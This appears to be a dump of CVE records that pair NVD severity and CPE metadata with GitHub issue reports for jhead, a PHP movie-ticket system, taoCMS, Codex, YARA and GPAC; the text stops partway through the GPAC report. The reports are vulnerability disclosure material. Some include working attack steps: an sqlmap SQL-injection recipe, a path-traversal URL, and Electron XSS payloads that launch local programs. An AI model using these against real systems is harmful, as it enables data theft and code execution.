"https://github.com/Matthias-Wandel/jhead/issues/7" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jhead_project:jhead:*:*:*:*:*:*:*:*", "matchCriteriaId": "F4043AC5-DC93-4FE4-8675-6AB0B60A385C", "versionEndExcluding": "3.04", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/Matthias-Wandel/jhead/issues/7
[ "Patch", "Third Party Advisory" ]
github.com
[ "Matthias-Wandel", "jhead" ]
poc:https://bugs.launchpad.net/ubuntu/+source/jhead/+bug/1900821/+attachment/5424955/+files/poc%20%282%29 ``` fstark@fstark-virtual-machine:~/jhead$ ./jhead fuzz1\:id\:000015\,sig\:06\,src\:000476\,time\:412880\,op\:arith8\,pos\:31\,val\:+29 ================================================================= ==957==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efd2 at pc 0x7f6d38f94676 bp 0x7ffd0abe47d0 sp 0x7ffd0abe3f78 READ of size 4 at 0x60200000efd2 thread T0 #0 0x7f6d38f94675 in memcmp (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x77675) #1 0x40e810 in ReadJpegSections /home/fstark/jhead/jpgfile.c:285 #2 0x410e86 in ReadJpegSections /home/fstark/jhead/jpgfile.c:125 #3 0x410e86 in ReadJpegFile /home/fstark/jhead/jpgfile.c:378 #4 0x40858b in ProcessFile /home/fstark/jhead/jhead.c:905 #5 0x402f2c in main /home/fstark/jhead/jhead.c:1756 #6 0x7f6d3886a83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #7 0x406708 in _start (/home/fstark/jhead/jhead+0x406708) 0x60200000efd2 is located 0 bytes to the right of 2-byte region [0x60200000efd0,0x60200000efd2) allocated by thread T0 here: #0 0x7f6d38fb5602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x40e4a8 in ReadJpegSections /home/fstark/jhead/jpgfile.c:172 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 memcmp Shadow bytes around the buggy address: 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa[02]fa fa fa 02 fa 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==957==ABORTING ```
heap-buffer-overflow on jhead-3.04/jpgfile.c:285 ReadJpegSections
https://api.github.com/repos/Matthias-Wandel/jhead/issues/7/comments
3
2020-10-22T09:49:38Z
2020-10-23T13:18:57Z
https://github.com/Matthias-Wandel/jhead/issues/7
727,231,481
7
3,170
CVE-2021-44866
2022-02-03T14:15:07.903
An issue was discovered in Online-Movie-Ticket-Booking-System 1.0. The file about.php does not perform input validation on the 'id' paramter. An attacker can append SQL queries to the input to extract sensitive information from the database.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/Online-Movie-Ticket-Booking-System-in-php/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/Online-Movie-Ticket-Booking-System-in-php/issues/6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:projectworlds:online_movie_ticket_booking_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "C5DE67C1-6787-49CD-8DFA-3747E0DCF7AF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/projectworldsofficial/Online-Movie-Ticket-Booking-System-in-php/issues/6
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "projectworldsofficial", "Online-Movie-Ticket-Booking-System-in-php" ]
Hey,I think there is a SQL Injection vulnerability in this system. The file about.php does not perform input validation on the 'id' paramter. So An attacker can append SQL queries to the input to extract sensitive information from the database. 1.Navigate to the about page: Example:http://172.16.180.135:8022/about.php?id=2 2.Save the request to file. Example: GET /about.php?id=2 HTTP/1.1 Host: 172.16.180.135:8022 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=9796kkls37f6d7l72qc806mge9 Upgrade-Insecure-Requests: 1 3.Run SQLmap on the file Example:sqlmap -r request.txt --dbms=mysql --threads=10 4.Get sensitive information from the database ![23](https://user-images.githubusercontent.com/19571618/144817059-2a5ddb17-f751-45b6-9f10-7b32e53e86df.png) about.php: ![233](https://user-images.githubusercontent.com/19571618/144817135-f937a102-c810-4f92-a4cd-8f6a879f5a55.png)
SQL Injection vulnerability via the "id" parameter in about.php
https://api.github.com/repos/projectworldsofficial/Online-Movie-Ticket-Booking-System-in-php/issues/6/comments
0
2021-12-06T08:59:58Z
2021-12-06T08:59:58Z
https://github.com/projectworldsofficial/Online-Movie-Ticket-Booking-System-in-php/issues/6
1,071,892,369
6
3,171
CVE-2022-23316
2022-02-04T12:15:07.673
An issue was discovered in taoCMS v3.0.2. There is an arbitrary file read vulnerability that can read any files via admin.php?action=file&ctrl=download&path=../../1.txt.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/15" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "552" ]
552
https://github.com/taogogo/taocms/issues/15
[ "Exploit", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
# analysis The location of the vulnerability is line 55 in \taocms\include\Model\File.php and we can see that the path parameter is passed directly to file_get_contents function without filtering ![20220110154029](https://raw.githubusercontent.com/destinypwd/images/main/20220110154029.png) ![20220110154107](https://raw.githubusercontent.com/destinypwd/images/main/20220110154107.png) # poc After login as admin,Enter the file management interface and edit function ![1](https://raw.githubusercontent.com/destinypwd/images/main/1.png) Get packets using brup Any file can be read after changing the path parameter ![20220110153415](https://raw.githubusercontent.com/destinypwd/images/main/20220110153415.png)
arbitrary file read vulnerability
https://api.github.com/repos/taogogo/taocms/issues/15/comments
1
2022-01-10T07:43:07Z
2022-12-20T03:17:15Z
https://github.com/taogogo/taocms/issues/15
1,097,551,779
15
3,172
CVE-2021-44983
2022-02-04T14:15:08.330
In taocms 3.0.1 after logging in to the background, there is an Arbitrary file download vulnerability at the File Management column.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/10" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "E6755F50-8491-4D27-B3D7-C28CC606C41A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "552" ]
552
https://github.com/taogogo/taocms/issues/10
[ "Exploit", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
First, we enter the background and use the administrator admin we created: ![image-20211210101406045](https://gitee.com/yecp/picgo/raw/master/20211210101406.png) Let's click "file management" on the left: ![image-20211210102337699](https://gitee.com/yecp/picgo/raw/master/20211210102337.png) Then use Burp Suite and click Download to grab the request package ![image-20211210101704321](https://gitee.com/yecp/picgo/raw/master/20211210101704.png) ![image-20211210101728293](https://gitee.com/yecp/picgo/raw/master/20211210101728.png) Changing the “path” parameter ![image-20211210101826206](https://gitee.com/yecp/picgo/raw/master/20211210101826.png)
There is a Arbitrary file download attack at " File Management column"(administrator authority)
https://api.github.com/repos/taogogo/taocms/issues/10/comments
0
2021-12-10T02:25:30Z
2021-12-10T02:25:30Z
https://github.com/taogogo/taocms/issues/10
1,076,352,526
10
3,173
CVE-2021-43635
2022-02-04T18:15:07.287
A Cross Site Scripting (XSS) vulnerability exists in Codex before 1.4.0 via Notebook/Page name field, which allows malicious users to execute arbitrary code via a crafted http code in a .json file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/jcv8000/Codex" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jcv8000/Codex/issues/8" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/jcv8000/Codex/releases/tag/v1.4.1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/jcv8000/Codex" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jcv8000/Codex/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/jcv8000/Codex/releases/tag/v1.4.1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:codex_project:codex:*:*:*:*:*:*:*:*", "matchCriteriaId": "A43C505F-D811-4731-880F-45CDDAC636AF", "versionEndExcluding": "1.4.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/jcv8000/Codex/issues/8
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jcv8000", "Codex" ]
### Issue Cross-site scripting(XSS) on Codex Notebook/Page name lead to code execution. ### Reproduction 1. Open Codex 2. Create new Notebook 3. Insert payload on the Notebook(or page) name field On Mac `<a href=x onmouseover="require('electron').shell.openExternal('file:///System/Applications/Calculator.app')">test</a>` On Windows `<a href=x onmouseover="require('electron').shell.openExternal('C:/Windows/System32/calc.exe')">test</a>` 4. Once you move your mouse over the link "test" , Calculator will be opened. <img width="949" alt="截圖 2021-09-10 下午4 59 27" src="https://user-images.githubusercontent.com/64322368/132828807-4742e2b6-c748-4ca1-8823-a6f484129d7f.png"> ### Mitigation Disable nodeIntegration
Code Execution vulnerability on Codex
https://api.github.com/repos/jcv8000/Codex/issues/8/comments
1
2021-09-10T09:06:09Z
2021-09-10T23:06:32Z
https://github.com/jcv8000/Codex/issues/8
993,038,886
8
3,174
CVE-2021-45429
2022-02-04T19:15:08.060
A Buffer Overflow vulnerablity exists in VirusTotal YARA git commit: 605b2edf07ed8eb9a2c61ba22eb2e7c362f47ba7 via yr_set_configuration in yara/libyara/libyara.c, which could cause a Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/VirusTotal/yara/issues/1616" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/VirusTotal/yara/issues/1616" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:virustotal:yara:*:*:*:*:*:*:*:*", "matchCriteriaId": "98D52101-1922-43B6-877D-A0AE6213E8F3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "4.2.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/VirusTotal/yara/issues/1616
[ "Exploit", "Third Party Advisory" ]
github.com
[ "VirusTotal", "yara" ]
version: master (commit https://github.com/VirusTotal/yara/commit/822e532c64759240b51ce8e439960ae4e90b71f0) command: yara $FILE strings PoC is a file that can contain any string, such as "hello". Here is the trace reported by ASAN: ``` root@d8a714203f6e:/path_to_yara/bin# ./yara PoC strings ================================================================= ==25743==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000763280 at pc 0x00000052260c bp 0x7ffda7b01e60 sp 0x7ffda7b01e58 READ of size 8 at 0x000000763280 thread T0 #0 0x52260b in yr_set_configuration /path_to_yara/libyara/libyara.c:395:26 #1 0x4eef83 in main /path_to_yara/cli/yara.c:1394:3 #2 0x7f7d5f39d83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #3 0x41b5e8 in _start (/path_to_yara/build/bin/yara+0x41b5e8) 0x000000763284 is located 0 bytes to the right of global variable 'max_process_memory_chunk' defined in 'cli/yara.c:167:12' (0x763280) of size 4 SUMMARY: AddressSanitizer: global-buffer-overflow /path_to_yara/libyara/libyara.c:395:26 in yr_set_configuration Shadow bytes around the buggy address: 0x0000800e4600: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x0000800e4610: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x0000800e4620: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x0000800e4630: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x0000800e4640: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 00 =>0x0000800e4650:[04]f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 0x0000800e4660: 01 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 0x0000800e4670: 04 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 0x0000800e4680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800e4690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800e46a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==25743==ABORTING ``` Commit 605b2edf07ed8eb9a2c61ba22eb2e7c362f47ba7 introduced a configuration case called `YR_CONFIG_MAX_PROCESS_MEMORY_CHUNK `, which will treat the `void *src` pointer as a `uint64_t*` pointer (64bit). The dereferece operation after this will read 64bits from src. https://github.com/VirusTotal/yara/blob/605b2edf07ed8eb9a2c61ba22eb2e7c362f47ba7/libyara/libyara.c#L381-L403 Note that, in cli/yara.c, a pointer to the 32bit integer `max_process_memory_chunk` is passed to `yr_set_configuration`. As a result, `yr_cfgs[name].ui64 = *(uint64_t *) src;` will read 64bits from a 32bit variable. This caused the ERROR reported by ASAN. https://github.com/VirusTotal/yara/blob/605b2edf07ed8eb9a2c61ba22eb2e7c362f47ba7/cli/yara.c#L166 https://github.com/VirusTotal/yara/blob/605b2edf07ed8eb9a2c61ba22eb2e7c362f47ba7/cli/yara.c#L1371-L1372 A potential damage of this is that an attacker who obtains control of `max_process_memory_chunk`'s next 4 bytes in the memory can further set the higher 32bits of `yr_cfgs[name].ui64` to arbitrary values and launch exhaustive attacks.
Possible insecure pointer conversion in yr_set_configuration() leading to global-buffer-overflow
https://api.github.com/repos/VirusTotal/yara/issues/1616/comments
3
2021-12-15T18:01:26Z
2021-12-20T09:31:28Z
https://github.com/VirusTotal/yara/issues/1616
1,081,328,626
1,616
3,175
CVE-2022-24249
2022-02-04T19:15:08.100
A Null Pointer Dereference vulnerability exists in GPAC 1.1.0 via the xtra_box_write function in /box_code_base.c, which causes a Denial of Service. This vulnerability was fixed in commit 71f9871.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2081" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2081" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/2081
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
**version info**: ``` MP4Box - GPAC version 1.1.0-DEV-rev1678-g92faba3-master GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/path_to_gpac/build --enable-debug --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FAAD GPAC_HAS_MAD GPAC_HAS_LIBA52 GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_FFMPEG GPAC_HAS_JP2 GPAC_HAS_THEORA GPAC_HAS_VORBIS GPAC_HAS_XVID GPAC_HAS_LINUX_DVB ``` **poc**: [poc](https://github.com/dandanxu96/PoC/raw/main/gpac/gpac-xtra_box_write-null-pointer-dereference-poc) **command**: MP4Box -hint -out /dev/null $poc$ **crash**: ``` root@d8a714203f6e:/path_to_gpac/build/bin# ./MP4Box -hint -out /dev/null poc [iso file] Unknown box type t8Aak in parent moov [iso file] Box "UNKN" is larger than container box [iso file] Box "moov" size 211 (start 20) invalid (read 2209) [iso file] Box "nmhd" (start 359) has 8 extra bytes [iso file] Unknown box type dreu in parent dinf [iso file] Box "UNKN" is larger than container box [iso file] Missing dref box in dinf [iso file] Box "dinf" size 36 (start 379) invalid (read 64) [iso file] Unknown box type url in parent srpp [iso file] Unknown box type srpp in parent srpp [iso file] Box "UNKN" is larger than container box [iso file] Box "srpp" size 1814 (start 415) invalid (read 1854) [iso file] Unknown box type dre- in parent dinf [iso file] Box "UNKN" is larger than container box [iso file] Missing dref box in dinf [iso file] Box "dinf" size 36 (start 2229) invalid (read 64) [isom] invalid tag size in Xtra ! [isom] invalid tag size in Xtra ! [isom] not enough bytes in box Xtra: 46 left, reading 1836070003 (file isomedia/box_code_base.c, line 12754), skipping box [iso file] Box "Xtra" (start 2265) has 60 extra bytes [iso file] Unknown top-level box type 00000001 0.500 secs Interleaving utils/bitstream.c:1053:6: runtime error: null pointer passed as argument 2, which is declared to never be null ``` Here is the trace reported by debugging. We can see that the `memcpy` function is called on line 1053 of `utils/bitstream.c`, which will copy the contents of the second parameter `data` to the buffer pointed to by the first parameter. Unfortunately, in this trace the `data` is 0 (NULL), causing the program to crash. ``` In file: /path_to_gpac/src/utils/bitstream.c 1048 case GF_BITSTREAM_FILE_READ: 1049 case GF_BITSTREAM_FILE_WRITE: 1050 if (bs->cache_write) { 1051 //if block fits in our write cache, write it 1052 if (bs->buffer_written + nbBytes < bs->cache_write_size) { ► 1053 memcpy(bs->cache_write+bs->buffer_written, data, nbBytes); 1054 bs->buffer_written+=nbBytes; 1055 return nbBytes; 1056 } 1057 //otherwise flush cache and use file write 1058 bs_flush_write_cache(bs); pwndbg> backtrace #0 gf_bs_write_data (bs=0x60f00000dc90, data=0x0, nbBytes=1) at utils/bitstream.c:1053 #1 0x00007ff9797a8f82 in xtra_box_write (s=0x60400000d590, bs=0x60f00000dc90) at isomedia/box_code_base.c:12814 #2 0x00007ff979816fb8 in gf_isom_box_write_listing (a=0x60400000d590, bs=0x60f00000dc90) at isomedia/box_funcs.c:1834 #3 0x00007ff979817737 in gf_isom_box_write (a=0x60400000d590, bs=0x60f00000dc90) at isomedia/box_funcs.c:1883 #4 0x00007ff9798b432c in WriteInterleaved (mw=0x7ffd2b3ab870, bs=0x60f00000dc90, drift_inter=GF_TRUE) at isomedia/isom_store.c:1963 #5 0x00007ff9798bb1ca in WriteToFile (movie=0x616000009c80, for_fragments=GF_FALSE) at isomedia/isom_store.c:2549 #6 0x00007ff9798574d1 in gf_isom_write (movie=0x616000009c80) at isomedia/isom_read.c:600 #7 0x00007ff979857a3f in gf_isom_close (movie=0x616000009c80) at isomedia/isom_read.c:624 #8 0x00000000004413cc in mp4boxMain (argc=5, argv=0x7ffd2b3b0478) at main.c:6547 #9 0x00000000004416f2 in main (argc=5, argv=0x7ffd2b3b0478) at main.c:6601 #10 0x00007ff975d2e840 in __libc_start_main (main=0x4416d2 <main>, argc=5, argv=0x7ffd2b3b0478, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7ffd2b3b0468) at ../csu/libc-start.c:291 #11 0x000000000040fd09 in _start () ``` I tracked the null assignment of `data` in `isomedia/box_code_base.c`. `data2` 